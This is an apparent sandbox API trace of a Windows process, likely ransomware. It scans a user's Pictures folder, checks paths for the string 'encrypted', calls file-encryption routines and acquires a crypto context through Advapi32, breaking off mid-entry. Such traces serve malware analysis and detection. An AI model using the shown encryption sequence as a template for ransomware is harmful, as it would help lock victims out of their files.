returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ks-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.927] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.927] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.927] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.927] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.927] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.927] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.927] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.927] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.927] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f309b90, ftCreationTime.dwHighDateTime=0x1d5bad4, ftLastAccessTime.dwLowDateTime=0x14b56b20, ftLastAccessTime.dwHighDateTime=0x1d5bea6, ftLastWriteTime.dwLowDateTime=0x14b56b20, ftLastWriteTime.dwHighDateTime=0x1d5bea6, nFileSizeHigh=0x0, nFileSizeLow=0x123cb, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="QZEtzxM.bmp", cAlternateFileName="")) returned 0x7c2100 [0039.927] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.927] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.927] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.928] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.928] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.928] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.928] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.928] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.928] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.928] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.928] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.928] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.928] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.928] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.928] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.928] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0039.929] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.929] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.929] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.929] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.929] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.929] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.929] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.929] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.929] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.929] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 